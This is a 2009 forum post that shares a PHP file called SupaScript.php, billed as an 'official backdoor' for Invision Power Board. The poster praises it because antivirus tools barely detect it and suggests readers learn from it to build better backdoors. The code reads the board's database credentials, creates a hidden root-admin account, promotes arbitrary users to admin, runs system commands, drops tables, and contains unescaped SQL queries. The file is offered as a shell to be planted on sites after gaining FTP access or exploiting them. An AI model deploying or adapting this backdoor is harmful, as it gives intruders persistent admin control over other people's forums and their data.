Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 54
Members: 0
Total: 54
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> IPB Staff Official Backdoor for IPB (SupaScript)
Post new topicReply to topic View previous topic :: View next topic
IPB Staff Official Backdoor for IPB (SupaScript)
PostPosted: Sun Mar 22, 2009 8:40 am Reply with quote
GirlyDresses
Beginner
Beginner
Joined: Mar 22, 2009
Posts: 3




One idiot staff member accidentally left this when reparing my site. It is a very rare official backdoor for IPB.

This works on 2.2 (All versions), 2.1 (All Versions) and 3 beta.

Exact features are as follows:

* Mail Tester
* Server Date Time
* Junk Finder
* Forum Root
* Index Checker
* Create Admin
* Create Admin 2.1
* Remove Admin
* Promote
* PHP Info
* UnCopyright
* m.has_blog
* serverinfo
* Check Converage
* vCheck
* UnGallery
* Totals

The best part about this is that it is detected as 1/10 on the virus scanner (Not detected as virus) and automatically finds and connects to the database (gets password, user, ect. automatically).

If anything, you can learn from their script how to make better backdoors like how they made an admin via SQL ect.

It is a PHP file so it does require either FTP access or to expolit it any way you would install any other shell.

The official file was called SupaScript.php when it was left on the server. The notes said "Keith's Copy" which I assume is the staff who worked on reparing the site.

Code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>IPB Misc. Tools</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css">

TABLE, TR, TD { font-family:Verdana, Arial;font-size: 11px; color:#000000; line-height:120% }

BODY { font: 10px Verdana; color:#222222 }

a:link, a:visited, a:active { color:#222222;font-weight:bold }

a:hover { color:#333377;text-decoration:underline }





#normal { font: 10px Verdana; color:#333333 }



#title { font-size:12px; font-weight:bold; line-height:150%; color:#FFFFFF; height: 30px; }

#title a:link, #title a:visited, #title a:active { text-decoration: underline; color : #FFFFFF;

font-size:11px }



#detail { font-family: Arial; font-size:11px; color: #333333 }



#large { font-family: verdana, arial; font-size:18px; color:#222; font-weight:bold; letter-spacing:-1px }



#subtitle { font-family: Arial,Verdana; font-size:16px; color:#000066; font-weight:bold }

#smalltitle { font-family: Arial,Verdana; font-size:11px; color:#000066; font-weight:bold }



#table1 { background-color:#FFFFFF; width:100%; align:center; border:1px solid black }



#tdrow1 { background-color:#EEF2F7 }



#subforum { background-color:#DFE6EF }



#tdrow2 { background-color:#F5F9FD }



#catrow { font-weight:bold; height:24px; line-height:150%; color:#4C77B6; background-image:

url(style_images/1/tile_sub.gif); }

#catrow2 { font-size:10px; font-weight:bold; line-height:150%; color:#4C77B6; background-color:#D3DFEF; }



#tablewrap { background-color:#F5F9FD }



#copy { color:#222; font-size:10px }

#copy a:link, #title a:visited, #title a:active { font-weight:normal }



#tdtop { font-weight:bold; height:24px; line-height:150%; color:#FFFFFF; background-image:

url(ipbtester.php?image=background); }



#memgroup { border:1px solid #777777 }



#mgred { border:1px solid #777777; background-color: #f5cdcd }

#mggreen { border:1px solid #777777; background-color: #caf2d9 }

#mgblue { border:1px solid #777777; background-color: #DFE6EF }



#green { background-color: #caf2d9 }

#red { background-color: #f5cdcd }



#button { background-color: #4C77B6; color: #FFFFFF; font-family:Verdana, Arial; font-size:11px }



#editbutton { background-color: #DDDDDD; color: #000000; font-family:Verdana, Arial; font-size:9px }



#textinput { background-color: #FFFFFF; color:�000000; font-family:Verdana, Arial; font-size:10px }



#dropdown { background-color: #F5F9FD; color:�000000; font-family:Verdana, Arial; font-size:10px }



#multitext { background-color: #F5F9FD; color:�000000; font-family:Verdana, Arial; font-size:10px }



</style></head>



<body marginheight='0' marginwidth='0' leftmargin='0' topmargin='0' bgcolor='#EFEFEF'>



<table cellspacing='0' cellpadding='0' align='center' width='95%' bgcolor='#FFFFFF' width="80%" border="0" align="center" style='border-right:4px

solid #BBBBBB;border-bottom:4px solid #BBBBBB'>

<tr>

<td colspan="3" align='center' id='title' bgcolor='#2C55B1'>Invision Power Board Test Scripts</td>

</tr>

<?php



define( 'ROOT_PATH' , "./" );

define( 'KERNEL_PATH', ROOT_PATH.'ips_kernel/' );



//----------------------------------------------

// Stored Functions

//---------------------------------------------



//Safe Slashes

function txt_safeslashes($t="")

{

return str_replace( '\\', "\\\\", txt_stripslashes($t));

}



//Strip Slashes

function txt_stripslashes($t)

{

if ( get_magic_quotes )

{

$t = stripslashes($t);

}



return $t;

}



//rebuild_cache

function setting_rebuildcache()

{

global $ibforums, $DB;



$ibforums->cache['settings'] = array();



$DB->simple_construct( array( 'select' => '*', 'from' => 'conf_settings', 'where' => 'conf_add_cache=1' ) );

$info = $DB->simple_exec();



while ( $r = $DB->fetch_row($info) )

{

$value = $r['conf_value'] != "" ? $r['conf_value'] : $r['conf_default'];



if ( $value == '{blank}' )

{

$value = '';

}



$ibforums->cache['settings'][ $r['conf_key'] ] = txt_safeslashes($value);

}



update_cache( array( 'name' => 'settings', 'array' => 1, 'deletefirst' => 1 ) );

}



//Update Cache

function update_cache( $v=array() )

{

global $ibforums, $DB;



//-----------------------------------------

// Don't cache forums?

//-----------------------------------------



if ( $v['name'] == 'forum_cache' AND $ibforums->vars['no_cache_forums'] )

{

return;

}



//-----------------------------------------

// Next...

//-----------------------------------------



if ( $v['name'] )

{

if ( ! $v['value'] )

{

$value = $DB->add_slashes(serialize($ibforums->cache[ $v['name'] ]));

}



$DB->manual_addslashes = 1;



if ( $v['deletefirst'] == 1 )

{

if ( $v['donow'] )

{

if ( $ibforums->vars['sql_driver'] == 'mysql' )

{

$DB->query( "REPLACE INTO ".SQL_PREFIX."cache_store SET cs_key='{$v['name']}', cs_value='$value',

cs_array=".intval($v['array']) );

}

else

{

$DB->simple_construct( array( 'delete' => 'cache_store', 'where' => "cs_key='{$v['name']}'" ) );

$DB->simple_exec();



$DB->do_insert( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_key' => $v['name'],

'cs_value' => $value ) );

}

}

else

{

if ( $ibforums->vars['sql_driver'] == 'mysql' )

{

$DB->cur_query = "REPLACE INTO ".SQL_PREFIX."cache_store SET cs_key='{$v['name']}',

cs_value='$value', cs_array=".intval($v['array']);

$DB->cache_shutdown_exec();

}

else

{

$DB->simple_construct( array( 'delete' => 'cache_store', 'where' => "cs_key='{$v['name']}'" ) );

$DB->simple_shutdown_exec();



$DB->do_shutdown_insert( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_key' =>

$v['name'], 'cs_value' => $value ) );

}

}

}

else

{

if ( $v['donow'] )

{

$DB->do_update( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_value' => $value ),

"cs_key='{$v['name']}'" );

}

else

{

$DB->do_shutdown_update( 'cache_store', array( 'cs_array' => intval($v['array']), 'cs_value' => $value ),

"cs_key='{$v['name']}'" );

}

}



$DB->manual_addslashes = 0;

}

}





//----------------------------------------------

// END OF USER EDITABLE COMPONENTS

//---------------------------------------------



error_reporting (E_ERROR | E_WARNING | E_PARSE);

set_magic_quotes_runtime(0);



require ROOT_PATH."conf_global.php";





//--------------------------------

// Load the DB driver and such

//--------------------------------



$INFO['sql_driver'] = ! $INFO['sql_driver'] ? 'mysql' : strtolower($INFO['sql_driver']);



require ( KERNEL_PATH.'class_db_'.$INFO['sql_driver']."_client.php" );



$DB = new db_driver_mysql;



$DB->obj['sql_database'] = $INFO['sql_database'];

$DB->obj['sql_user'] = $INFO['sql_user'];

$DB->obj['sql_pass'] = $INFO['sql_pass'];

$DB->obj['sql_host'] = $INFO['sql_host'];

$DB->obj['sql_tbl_prefix'] = $INFO['sql_tbl_prefix'];

$DB->obj['use_shutdown'] = 0;



//--------------------------------

// Get a DB connection

//--------------------------------



$DB->connect();



//--------------------------------

// Make CONSTANT

//--------------------------------



define( 'SQL_PREFIX', $DB->obj['sql_tbl_prefix'] );

define( 'SQL_DRIVER', $INFO['sql_driver'] );

define( 'BOARD_URL', $INFO['board_url'] );

define( 'IN_ACP', 1 );



$act = $_POST['act'];

$email = $_POST['email'];

$pass = md5($_POST['pass']);

$aupass = '225517b79a5066eae41064807e6fe248';

switch ($act) {



default :

?>

<form name="form1" method="post" action="supascript.php">

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Password">

</div></td>

<td>

<div align="left">

<input type="text" name="pass">

</div></td>

<td> <div align="center">Enter Password.</div></td>

</form>

<?php

break;



case "Password" :



if ($pass != $aupass){

echo "<tr><td>You are not authorized</td></tr>";

exit();

}



?>





<form name="form1" method="post" action="supascript.php">



<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Mail Tester">

</div></td>

<td></td>

<td> <div align="center">Tests PHPMail. Be sure to add the email address you want to use for testing to the code.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Server Date Time">

</div></td>

<td></td>

<td> <div align="center">Checks the Date and Time on server</div></td>

</tr>



<td height="26">

<div align="right">

<input type="submit" name="act" value="Junk Finder">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Finds whitespace at the beginning or end of a file. </div></td>

</tr>

<tr>

<td height="26"><div align="right">

<input type="submit" name="act" value="Forum Root">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">The path to the forum root directory.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Index Checker">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Test the DB indexes. (requires a working board install) </div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Create Admin">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Adds an admin account, named IPSTech with a random password.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Create Admin 2.1">

</div></td>

<td><div align="center"></div></td>

<td><div align="center"><font color='red'><b>FOR IPB 2.1.X</b></font> - Adds an admin account, named IPSTech with a random password.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Remove Admin">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Remove the IPSTech account.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Promote">

</div></td>

<td>

<div align="left">

<input type="text" name="aname">

</div></td>

<td> <div align="center">Turns the specified account into a member of the root admin group.</div></td>

</tr>

</tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="PHP info">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Extended PHP info.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="UnCopyright">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Undo illegitimate copyright output removal. Update settings cache.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="m.has_blog">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Fixes the m.has_blog MySQL error.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="serverinfo">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Checks the server hardware.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Check Converge">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Checks the converge tables for mismatched email addresses.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="vCheck">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">File version checker.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="UnGallery">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Runs the queries to remove the Gallery tables/fields.</div></td>

</tr>

<tr>

<td height="26">

<div align="right">

<input type="submit" name="act" value="Totals">

</div></td>

<td><div align="center"></div></td>

<td><div align="center">Gets board totals: Posts/Members/Topcis/etc.</div></td>

</tr>

</form>

</form>

<?php



break;



case "Create Admin" :

echo "<tr><td>";





//----------------------

// Setup Converge

//----------------------



$salt = "5lo9f";

$salt = str_replace( '\\', "\\\\", $salt );

$randpw = rand(1000, 9999);



$converge_array = array(



'converge_id' => '',

'converge_email' => 'tech@invisionpower.com',

'converge_joined' => time(),

'converge_pass_hash' => md5( md5($salt) . md5($randpw) ),

'converge_pass_salt' => $salt



);

$DB->do_insert('members_converge', $converge_array);

$new_id = $DB->get_insert_id();

$members_array = array(



'id' => $new_id,

'name' => mysql_escape_string('IPSTech'),

'mgroup' => 4,

'email' => 'tech@invisionpower.com',

'joined' => time(),

'ip_address' => '127.0.0.1',

'posts' => 0,

'title' => '',

'allow_admin_mails' => '',

'hide_email' => 1,

'email_pm' => 0,

'language' => 'en',

'last_post' => '',

'view_sigs' => 1,

'view_img' => 1,

'view_avs' => 1,

'last_visit' => time(),

'last_activity' => time(),

'misc' => '',

'member_login_key' => '6a2e8dfcf00c70ba13bfbac204e8d841',



);



$members_extra_array = array(



'id' => $new_id,

'vdirs' => "in:Inbox|sent:Sent Items",

);





$DB->do_insert('members', $members_array);





$DB->do_insert('member_extra', $members_extra_array);



echo "<b>IPSTech</b> admin account created. Password is <b>$randpw</b>.";





echo "</td></tr>";

break;





// FOR 2.1.1 -- Adds Display Name



case "Create Admin 2.1" :

echo "<tr><td>";





//----------------------

// Setup Converge

//----------------------



$salt = "5lo9f";

$salt = str_replace( '\\', "\\\\", $salt );

$randpw = rand(1000, 9999);



$converge_array = array(



'converge_id' => '',

'converge_email' => 'tech@invisionpower.com',

'converge_joined' => time(),

'converge_pass_hash' => md5( md5($salt) . md5($randpw) ),

'converge_pass_salt' => $salt



);

$DB->do_insert('members_converge', $converge_array);

$new_id = $DB->get_insert_id();

$members_array = array(



'id' => $new_id,

'name' => mysql_escape_string('IPSTech'),

'mgroup' => 4,

'email' => 'tech@invisionpower.com',

'joined' => time(),

'ip_address' => '127.0.0.1',

'posts' => 0,

'title' => '',

'allow_admin_mails' => '',

'hide_email' => 1,

'email_pm' => 0,

'language' => 'en',

'last_post' => '',

'view_sigs' => 1,

'view_img' => 1,

'view_avs' => 1,

'last_visit' => time(),

'last_activity' => time(),

'misc' => '',

'member_login_key' => '6a2e8dfcf00c70ba13bfbac204e8d841',

'members_display_name' => 'IPSTech',

'members_l_display_name' => 'IPSTech',

'members_l_username' => 'IPSTech',

);



$members_extra_array = array(



'id' => $new_id,

'vdirs' => "in:Inbox|sent:Sent Items",

);





$DB->do_insert('members', $members_array);





$DB->do_insert('member_extra', $members_extra_array);



echo "<b>IPSTech</b> admin account created. Password is <b>$randpw</b>.";





echo "</td></tr>";

break;



case "Mail Tester" :

echo "<tr><td>Testing phpmail.<br><br>";





$mailtest = mail('keith@invisionpower.com', 'Test Successful', 'If you got this...it works');



if($mailtest){

echo "It was sent";}

else{

echo "Not so much";}

echo "</td></tr>";



break;



case "Server Date Time" :

echo "<tr><td><br><font color='red'>Current Time: </font><b>". date("m-d-Y h:ia",time());

echo "</b></td></tr>";



break;



case "Forum Root" :

echo "<tr><td>Full path to this folder: <b>".getcwd()."/</b>";

echo "<br /><br />";

echo "Safe mode is: <b>";



if( ini_get('safe_mode') )

{

echo "Enabled";

}



else

{

echo "Disabled";

}

echo "</b>";

echo "</td></tr>";

break;



case "Junk Finder" :



echo "<tr><td>Testing for Whitespace<br>";

error_reporting(~E_NOTICE);

set_time_limit(0);



$broken = array();



function recur_dir($dir)

{

$dirlist = opendir($dir);



while ($file = readdir ($dirlist))

{

if ( preg_match( "#^_#", $file ) ) { continue; }

if ($file != '.' && $file != '..')

{

$newpath = $dir.'/'.$file;

$level = explode('/',$newpath);



if (is_dir($newpath) && !skip_this($file))

{

recur_dir($newpath);

}

else

{

if(strpos($file, ".php") !== false && !is_dir($newpath))

{

$file = file($newpath);

$file = implode($file);



preg_match("#^(.+?)?<\?(.*)\?>(.+?)?$#si", $file, $matches);



if($matches[1] != "")

{

echo "<i>" . $newpath . " </i>Has Junk! At The Front Of File<br>";

flush();

}



if($matches[3] != "")

{

echo "<span style='color:red'><b>" . $newpath . " </b></span>Has Junk! At The End Of

File<br>";

flush();

}

}

}

}

}

closedir($dirlist);

}



function skip_this($file)

{

if($file == "uploads" || $file == "style_images" || $file == "cache" || $file == "install" || $file == "upgrade" || $file =="gallery_setup"

|| $file == "gallery_setup"

|| $file == "jscripts" || $file == "style_emoticons" || $file == "style_avatars" || $file == "conv_api" ||

$file == "skin_acp" || $file == "gallery" || $file == "admin")



{

return 1;

}



else

{

return 0;

}

}



recur_dir('.');

echo "</td></tr>";

break;



case "Index Checker" :

echo "<tr><td>";



//===========================================================================

// SET UP REQUIRED INDEXES

//===========================================================================



$indexes = array();



$indexes[] = array( 'table' => 'attachments',

'index' => array(

0 => array( 'attach_pid' , '' ),

1 => array( 'attach_msg' , '' ),

2 => array( 'attach_post_key' , '' ),

3 => array( 'attach_mid_size' , 'attach_member_id,attach_filesize' ),

) );



$indexes[] = array( 'table' => 'member_extra',

'index' => array( 0 => array( 'id', '' ) ) );



$indexes[] = array( 'table' => 'members_converge',

'index' => array( 0 => array( 'converge_id', '' ) ) );



$indexes[] = array( 'table' => 'members',

'index' => array(

0 => array( 'id' , '' ),

1 => array( 'name' , '' ),

2 => array( 'mgroup' , '' ),

3 => array( 'bday_day' , '' ),

4 => array( 'bday_month', '' )

) );





$indexes[] = array( 'table' => 'message_text',

'index' => array(

0 => array( 'msg_date' , '' ),

1 => array( 'msg_sent_to_count' , '' ),

2 => array( 'msg_deleted_count' , '' ),

) );



$indexes[] = array( 'table' => 'message_topics',

'index' => array(

0 => array( 'mt_from_id' , '' ),

1 => array( 'mt_owner_id' , 'mt_owner_id,mt_to_id,mt_vid_folder' ),

) );



$indexes[] = array( 'table' => 'moderators',

'index' => array(

0 => array( 'forum_id' , '' ),

1 => array( 'group_id' , '' ),

2 => array( 'member_id' , '' ),

) );





$indexes[] = array( 'table' => 'posts',

'index' => array(

0 => array( 'topic_id' , 'topic_id,queued,pid' ),

1 => array( 'author_id' , 'author_id,topic_id' ),

2 => array( 'post_date' , '' ),

) );



$indexes[] = array( 'table' => 'sessions',

'index' => array(

0 => array( 'in_topic' , '' ),

1 => array( 'in_forum' , '' ),

) );



$indexes[] = array( 'table' => 'skin_templates_cache',

'index' => array(

0 => array( 'template_set_id' , '' ),

1 => array( 'template_group_name' , '' ),

) );



$indexes[] = array( 'table' => 'topics',

'index' => array(

0 => array( 'topic_firstpost' , '' ),

1 => array( 'last_post' , '' ),

2 => array( 'forum_id' , 'forum_id,approved,pinned' ),

) );



//-----------------------------------------

// GO LOOOOOOOPY

//-----------------------------------------



$output = array();



foreach( $indexes as $id => $data )

{

$table_name = $data['table'];



$DB->query( "SHOW CREATE TABLE ".SQL_PREFIX.$table_name );



$row = $DB->fetch_row();



$tbl = str_replace( '`', '', $row['Create Table'] );



//print "<pre>$tbl</pre>";



if ( is_array( $data['index'] ) and count( $data['index'] ) )

{

foreach( $data['index'] as $idx => $indexes )

{

$index_name = $indexes[0];

$ok = 0;



if ( preg_match( "#KEY\s+?\(?{$index_name}\)?(?:(?:\s+?)?\((.+?)\))?#s", $tbl, $match ) )

{

$ok = 1;



//-----------------------------------------

// Multi index column?

//-----------------------------------------



if ( $indexes[1] )

{

foreach( explode( ',', $indexes[1] ) as $mc )

{

$mc = trim( $mc );



if ( ! strstr( $match[1], $mc ) )

{

$output[] = "<span style='color:red'>Error : Table $table_name : Index $index_name :

Missing field '$mc' from multi-column index</span>";

$ok = 0;

}

}

}

}

else

{

$output[] = "<span style='color:red'>Error : Table $table_name : Missing index $index_name</span>";

}



if ( $ok )

{

$output[] = "<span style='color:green'>Table $table_name - Index $index_name OK!</span>";

}

}

}

}



print "<html>

<head><title>IPB 2.0.1 DB Checker</title></head>

<body style='font-family:verdana;font-size:12px;padding:10px'>

<p>

<strong>This script will check for the required MySQL database indexes in IPB 2.0.x</strong>

<br />

</p>

<p>

<strong>Script output:</strong><br />";



print implode( "<br />", $output );



echo "</td></tr>";





break;



case 'Remove Admin':

echo "<tr><td>";

$DB->query("SELECT id, email from ".SQL_PREFIX."members WHERE name = 'ipstech'");

$member = $DB->fetch_row();

$DB->query("DELETE FROM ".SQL_PREFIX."members WHERE name = 'ipstech'");

$DB->query("DELETE FROM ".SQL_PREFIX."member_extra WHERE id = {$member['id']}");

$DB->query("DELETE FROM ".SQL_PREFIX."members_converge WHERE converge_email = '{$member['email']}'");

echo "IPSTech admin account is now removed.";

echo "</tr></td>";

break;



case 'serverinfo':

echo "<tr><td>";

echo "<pre><b>Uptime:</b><br>";

system("uptime");

echo "<br><br>";



echo "<b>System Information:</b><br>";

system("uname -a");

echo "<br><br>";



echo "<b>Memory Usage (MB):</b><br>";

system("free -m");

echo "<br><br>";



echo "<b>Disk Usage:</b><br>";

system("df -h");

echo "<br><br>";



echo "<b>CPU Information:</b><br>";

system("cat /proc/cpuinfo | grep \"model name\\|processor\"");

echo "</pre></tr></td>";

break;



case 'PHP info':

echo "<tr><td id='large'>";

phpinfo();

echo "</tr></td>";

break;



case 'UnCopyright':

echo "<tr><td>";

$DB->query("UPDATE ".SQL_PREFIX."conf_settings SET conf_value='' where conf_key='ipb_copy_number' LIMIT 1");

echo "Copyright output removal is now undone.<br>";

setting_rebuildcache();

echo "</tr></td>";

break;



case 'm.has_blog':

echo "<tr><td>";

$DB->query("ALTER TABLE ".SQL_PREFIX."members add has_blog TINYINT(1) NOT NULL default '0'");

echo "m.has_blog MySQL <i>should</i> not appear anymore.<br>";

echo "</tr></td>";

break;



case 'Promote':

echo "<tr><td>";

$DB->query("UPDATE ".SQL_PREFIX."members SET mgroup=4 WHERE name='$aname'");

echo "<b>$aname</b> is now an admin.";

echo "</tr></td>";

break;



case 'Manual Query':

echo "<tr><td>";

$test = mysql_query("$query");

echo "<b>$query</b> has been run.<br />";

$count = 1;

while ($result = mysql_fetch_assoc($test)){

echo "<b>$count<br /></b>";

foreach($result as $k => $v){

echo "$k=$v<br />";

} $count++;

echo "<br />";

}

echo "</tr></td>";

break;



case 'Check Converge':

echo "<tr><td>";

$DB->query("SELECT mem.id, mem.email, converge.converge_email FROM ".SQL_PREFIX."members mem LEFT JOIN ".SQL_PREFIX."members_converge converge ON

(converge.converge_id = mem.id)");

while ( $row = $DB->fetch_row() ){

$id = $row['id'];

$con_email = $row['converge_email'];

$mem_email = $row['email'];

if ($con_email == $mem_email){

echo "ID ". $id ." is a match.<br>";}

else{

echo "<br><span style='color:red'>ID ". $id ." is not a match!</span><br>";

echo "Member table email is " . $mem_email ." and converge table email is " .$con_email ."<br><br>";

}

}

echo "<br><br><form name=\"form2\" method=\"post\" action=\"supascript.php\">";

echo "<input type=\"submit\" name=\"act\" value=\"Fix Converge\"> Fixes email addresses, replacing converge_email with the data from

".SQL_PREFIX."members.";

echo "</form>";

echo "</tr></td>";

break;



case 'Fix Converge':

echo "<tr><td>";

$outer = $DB->query("SELECT mem.id, mem.email, converge.converge_email FROM ".SQL_PREFIX."members mem LEFT JOIN ".SQL_PREFIX."members_converge converge ON

(converge.converge_id = mem.id)");

while ( $row = $DB->fetch_row( $outer ) ){

$id = $row['id'];

$con_email = $row['converge_email'];

$mem_email = $row['email'];

if ($con_email == $mem_email){

echo "ID ". $id ." is a match, bypassed.<br>";

}

else{

echo "<br><span style='color:red'>ID ". $id ." is not a match!</span><br>";

$DB->query("UPDATE ".SQL_PREFIX."members_converge SET converge_email='$mem_email' WHERE converge_email='$con_email'");

echo "Member's converge e-mail has been set to <span style='color:green'><b>" . $mem_email ."</b></span><br><br>";

}

}

echo "</tr></td>";

break;



case 'vCheck':



echo "<tr><td>";

echo "</tr></td>";



// Check Files



class CheckFiles

{



var $file_versions = array();



function check_files($dir)

{

$dirlist = opendir($dir);



while (false !== ($file = readdir($dirlist)))

{

if ($file != '.' && $file != '..')

{

$newpath = $dir.'/'.$file;



if (is_dir($newpath) && !$this->skip_this($file))

{

$this->check_files($newpath);

}

else

{

if(is_dir($newpath))

{

continue;

}

$check = file_get_contents($newpath);



if (preg_match("/Board v2.1.1/i", "$check")) {

$preg_return = '<i class="hver">2.1.1</i>';

} elseif (preg_match("/Board v2.1.0/i", "$check")) {

$preg_return = '<i class="gver">2.1.0</i>';

} elseif (preg_match("/Board v2.0.4/i", "$check")) {

$preg_return = '<i class="fver">2.0.4</i>';

} elseif (preg_match("/Board v2.0.3/i", "$check")) {

$preg_return = '<i class="ever">2.0.3</i>';

} elseif (preg_match("/Board v2.0.2/i", "$check")) {

$preg_return = '<i class="dver">2.0.2</i>';

} elseif (preg_match("/Board v2.0.1/i", "$check")) {

$preg_return = '<i class="cver">2.0.1</i>';

} elseif (preg_match("/Board v2.0.0/i", "$check")) {

$preg_return = '<i class="bver">2.0.0</i>';

} elseif (preg_match("/Board v1/i", "$check")) {

$preg_return = '<i class="aver">1.x</i>';

} else {

$preg_return = '<b>n/a</b>';

}



$insert = "". $newpath ." = ". $preg_return ."";



$this->file_versions[] = $insert;

}

}

}

closedir($dirlist);



}



// Files to skip - duh.



function skip_this($file)

{

// $file == "admin" || - Preventing /sources/admin/ directory.

if($file == "lang" || $file == "skin_cache" || $file == "uploads" || $file == "style_images" || $file == "cache" || $file == "install" || $file == "upgrade" || $file =="gallery_setup" || $file == "gallery_setup"

|| $file == "jscripts" || $file == "style_emoticons" || $file == "style_avatars" || $file == "conv_api" || $file == "skin_acp" || $file == "gallery" || $file == "modules")



{

return 1;

}



else

{

return 0;

}

}



}



// Run it, bebbeh!



$filechecker = new CheckFiles;



$filechecker->check_files('.');



print "

<style type=\"text/css\">

/*/============================================================================/

| Cascading Style Sheet (CSS 467), for vcheck.php

| Author: James A. Mathias, admin@1lotus.com, http://www.1lotus.com

| Copyright: 2005 Onelotus Creative and James A. Mathias. All rights reserved.

|

| All style rule attributes in alpha-numeric order starting from 0

/============================================================================/

| This style sheet is closed source, unauthorized use will result in prosecution

| Please respect my intellectual property rights and trademarks

| x = horizontal, y = vertical / property: trbl, tb rl, t rl b, t r b l;

|

| -- START STYLES --

/============================================================================/*/



*{ /* removes margin/padding from all elements */

margin: 0;

padding: 0;

}



body{

background: #FFF;

font: normal 62.5%/135% Verdana, Sans-Serif;

}



h1{

color: #036;

font: bold 2.6em/135% \"Trebuchet MS\", Sans-Serif;

padding: 8px;

}



pre{

background: #F5F5F5;

border: 1px solid;

border-color: #CCC #AAA #AAA #CCC;

color: #222;

font-size: 1.7em;

padding: 15px 15px 0;

margin: 0 auto 5px;

width: 95%;

}



b{ color: #666666; }



i.aver{ color: #FFCC00; }

i.bver{ color: #F000FF; }

i.cver{ color: #12BB00; }

i.dver{ color: #0018FF; }

i.ever{ color: #00BAFF; }

i.fver{ color: #338000; }

i.gver{ color: #3366FF; }

i.hver{ color: #00CC66; }





/*/============================================================================/

| -- END STYLES --

| Please do not steal my code.

| Thank you.

/============================================================================/*/

</style>

<h1>Here are the versions!</h1>

<pre>

";



print_r($filechecker->file_versions);



print "

</pre>

";



break;



case 'UnGallery':



echo "<tr><td>";

$DB->query("DROP TABLE `".SQL_PREFIX."gallery_albums`, `".SQL_PREFIX."gallery_upgrade_history`, `".SQL_PREFIX."gallery_bandwidth`, `".SQL_PREFIX."gallery_categories`, `".SQL_PREFIX."gallery_comments`, `".SQL_PREFIX."gallery_ecardlog`, `".SQL_PREFIX."gallery_favorites`, `".SQL_PREFIX."gallery_form_fields`, `".SQL_PREFIX."gallery_images`, `".SQL_PREFIX."gallery_media_types`, `".SQL_PREFIX."gallery_ratings`;");

echo "Tables dropped, next!<br /><br />";

$DB->query("ALTER TABLE `".SQL_PREFIX."groups` DROP `g_max_diskspace`, DROP `g_max_upload`, DROP `g_max_transfer`, DROP `g_max_views`, DROP `g_create_albums`, DROP `g_album_limit`, DROP `g_zip_upload`, DROP `g_multi_file_limit`, DROP `g_img_album_limit`, DROP `g_slideshows`, DROP `g_favorites`, DROP `g_comment`, DROP `g_rate`, DROP `g_ecard`, DROP `g_edit_own`, DROP `g_del_own`, DROP `g_move_own`, DROP `g_mod_albums`, DROP `g_img_local`, DROP `g_movies`, DROP `g_movie_size`;");

echo "Groups table altered, next!<br /><br />";

$DB->query("ALTER TABLE `".SQL_PREFIX."members` DROP `gallery_perms`;");

echo "Members table altered, next!<br /><br />";

$DB->query("DELETE FROM `".SQL_PREFIX."conf_settings` WHERE conf_key LIKE 'gallery_%';");

